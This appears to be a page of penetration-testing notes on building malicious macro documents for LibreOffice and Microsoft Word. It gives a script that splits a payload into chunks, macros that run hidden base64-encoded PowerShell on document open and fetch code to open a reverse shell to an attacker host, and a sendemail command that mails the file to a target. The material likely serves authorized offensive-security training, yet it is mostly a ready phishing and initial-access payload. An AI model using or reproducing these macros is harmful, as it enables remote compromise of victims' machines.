Office Macros

We will show here some methods to create macro payloads for Office documents.

LibreOffice

First we need to chunk up our payload as Macros have a limit of 50 characters. We can achieve this with below script:

s = "<payload>"
n = 50
for i in range(0, len(s), n):
    chunk = s[i:i + n]
    print('Str = Str + "' + chunk + '"')

Then we can add the payload as following in LibreOffice Macro documents.

Sub Exploit	
	Dim Str As String
	
	Str = Str + "cmd /c powershell.exe -nop -w hidden -e aQBmACgAWw"
	Str = Str + "BJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0"
	Str = Str + "ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAH"
	[snip]
	...
	[snip]
	Str = Str + "BwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABp"
	Str = Str + "AGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0AC"
	Str = Str + "gAJABzACkAOwA="
	
	Shell(Str)
End Sub

Then we can send an email using sendmail as seen below:

sendemail -f 'cub3@localhost' -t 'target@localhost' -s 192.168.248.140:25 -u 'Contact Information' -m 'Here the contact information you requested' -a doc.ods

Wes should then receive a reverse shell but we should also try other payload. We will show one other payload below which worked well against windows machines.

Sub Payday
	Set oShell = CreateObject("Wscript.Shell")
	oShell.Run("<payload>, 0)
End Sub

To make the macro start when opening the file we need to navigate to Tools -> Customize -> Events. Then we need to assign our macro to the OpenDocument Event.

Microsoft Office

We will show below how we can create a macro document which can be used to get inital access.

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String

    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
    Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
    Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    [snip]
    ...
    [snip]
    Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
    Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
    Str = Str + "A== "
    
    CreateObject("Wscript.Shell").Run Str
End Sub

We use the same python3 script we used above to split our payload into string chunks.

PreviousClient FingerprintingNextWindows Library Files

Last updated